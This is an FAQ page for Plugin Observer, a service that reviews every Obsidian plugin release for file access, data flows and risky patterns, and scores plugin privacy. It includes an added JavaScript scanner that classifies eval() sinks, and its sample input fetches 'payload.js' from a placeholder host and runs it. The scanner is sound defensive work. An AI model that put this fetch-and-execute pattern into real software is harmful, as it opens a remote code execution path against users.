Obsidian reviews plugins once. We review every update.
When a plugin is first submitted, the Obsidian team reviews the code. After that, every update ships directly to your vault without review. Plugin Observer analyzes every version of every plugin so you can see what changed.
Obsidian plugins run without a sandbox — they can access any file on your computer, not just your vault. There is no permission system that limits what a plugin can do. This is a known limitation of the platform, not a secret.
Plugin Observer exists to make that risk visible. We analyze every plugin's code and show you exactly what it accesses, where it sends data, and whether its behavior has changed between versions.
Yes. Every version of every community plugin is analyzed when it ships. Each release is compared against the previous version so changes are visible before you update.
The pipeline diagram below shows what happens each time a plugin publishes a new release.
Yes. We analyze the built JavaScript that gets installed on your machine, not just the source code on GitHub. This matters because the two can differ — a plugin's GitHub repository might look clean while the published release contains different or additional code.
When we reproduce a build from source and compare it to the published release, there are three possible outcomes: the build matches, the build differs (a red flag), or the build is unverifiable. Unverifiable means the build output differs from the release, but the plugin has no lockfile. Without a lockfile, dependency versions may have drifted since the release was built, making it impossible to determine whether the difference is from dependency drift or intentional tampering.
Four areas:
Which of your files the plugin reads from your vault
Where data gets sent (which hosts, which protocols)
Whether your notes actually reach network endpoints
Risky patterns like dynamic code execution, obfuscation, or known-vulnerable dependencies. We distinguish between patterns that are legitimate user-facing features (like eval() for custom queries) and patterns that could indicate malicious behavior (like eval() executing code fetched from the network).
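The eval() distinction in the last point, as an added example that is not part of Plugin Observer's analyzer: a small static scan over a constructed, unminified plugin bundle that tracks where the argument of eval() or new Function() came from. A value assigned from fetch(), or from Obsidian's requestUrl()/request(), is marked as network-sourced; a value read from settings or the editor is marked as user-sourced; the sink is then rated by that origin. The sample bundle, the variable names and the severity labels are all constructed for this illustration. The regular-expression approach is deliberately simple; production tooling would work on an AST, since shipped bundles are minified.

```javascript
// Added example (not Plugin Observer's code): classify dynamic-execution sinks
// by the origin of their argument. Line-oriented and regex-based on purpose.
const NETWORK_SOURCES = /\b(?:fetch|requestUrl|request)\s*\(/;   // requestUrl/request: Obsidian API
const USER_SOURCES = /\b(?:settings|getValue\(\)|getSelection\(\))\b/;
const ASSIGN = /\b(?:const|let|var)\s+(\w+)\s*=\s*(?:await\s+)?(.+)$/;
const SINK = /\b(eval|new\s+Function)\s*\(\s*([^)]*)\)/;

function mentions(identifier, text) {
  return new RegExp(`\\b${identifier}\\b`).test(text);
}

// Returns one finding per sink: { line, sink, origin, severity }.
function scanBundle(source) {
  const lines = source.split('\n');
  const taint = new Map(); // identifier -> 'network' | 'user'

  // Pass 1: propagate origin through simple declarations, top to bottom.
  for (const line of lines) {
    const m = line.match(ASSIGN);
    if (!m) continue;
    const [, name, rhs] = m;
    if (NETWORK_SOURCES.test(rhs)) {
      taint.set(name, 'network');
    } else if (USER_SOURCES.test(rhs)) {
      taint.set(name, 'user');
    } else {
      // e.g. `const code = await resp.text()` inherits the origin of `resp`
      for (const [id, origin] of taint) {
        if (mentions(id, rhs)) { taint.set(name, origin); break; }
      }
    }
  }

  // Pass 2: rate each sink by what flows into it.
  const findings = [];
  lines.forEach((line, index) => {
    const m = line.match(SINK);
    if (!m) return;
    const [, sink, arg] = m;
    let origin = 'unknown';
    for (const [id, o] of taint) {
      if (mentions(id, arg)) { origin = o; break; }
    }
    if (origin === 'unknown' && USER_SOURCES.test(arg)) origin = 'user';
    const severity = origin === 'network' ? 'high' : origin === 'user' ? 'info' : 'medium';
    findings.push({ line: index + 1, sink: sink.replace(/\s+/g, ' '), origin, severity });
  });
  return findings;
}

// Constructed sample bundle (hypothetical plugin, not a real one).
const SAMPLE_BUNDLE = [
  '// user-facing feature: evaluate a query the user typed into settings',
  'const query = this.settings.customQuery;',
  'const rows = eval(query);',
  '// code fetched from the network and executed',
  'const resp = await fetch("https://example.invalid/payload.js");',
  'const code = await resp.text();',
  'new Function(code)();',
].join('\n');

for (const f of scanBundle(SAMPLE_BUNDLE)) {
  console.log(`line ${f.line}: ${f.sink} with ${f.origin}-sourced argument -> ${f.severity}`);
}
```

An "unknown" origin is reported at medium rather than dropped: a sink whose input the scanner cannot trace is exactly the case a human reviewer should look at, and silently rating it as benign would hide it.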
Each plugin gets a privacy score from 0 to 100. The score reflects how the plugin handles your data — not its quality, usefulness, or the developer's intent.
A plugin that sends your notes to a cloud API will score lower than one that works entirely offline, even if both are well-written and legitimate. The score is a transparency tool: it tells you what's happening with your data so you can make an informed choice.
For the full methodology — privacy levels, scoring factors, and how confidence works — see How Scoring Works.
The Obsidian team has disabled 7 plugin versions and 2 entire plugins — all for data corruption or data loss, not malicious behavior. No confirmed malicious plugin has been discovered in the community registry yet.
But the absence of a known incident doesn't mean the risk isn't real. Updates ship without review, plugins have full system access, and dependencies can be compromised upstream. Plugin Observer's automated analysis means changes are flagged as soon as they ship.
Our analysis catches the same patterns regardless of whether code was written by a human or generated by AI. Poorly-written plugins — whether vibe-coded or not — are more likely to trigger findings for unnecessary network calls, excessive dependencies, or unsafe patterns.
More plugins are being generated by AI, and authors don't always understand the code they ship. That makes automated review more useful, not less.
If you use community plugins on a work computer, your IT department should know. Plugins can access files beyond your vault — they run with the same permissions as Obsidian itself, which means anything on your filesystem.
Plugin Observer can help you and your IT team evaluate which plugins are appropriate for your environment. Each plugin's detail page shows exactly what it accesses and where it sends data.
No. A low score means the plugin demonstrates confirmed behaviors that could compromise your data — like sending vault contents to hardcoded external servers. Having capabilities alone (like a configurable API endpoint) doesn't tank a score. Many useful plugins legitimately need network access — AI assistants, sync tools, translation services, publishing workflows.
The score helps you understand what a plugin does with your data, not whether the developer has bad intentions.
No. We use static analysis — we examine code without running it. We can identify patterns and data flows, but we cannot catch every possible runtime behavior or detect threats that only manifest under specific conditions.
Plugin Observer gives you more information than you'd otherwise have, but it doesn't replace good judgment about which plugins you install.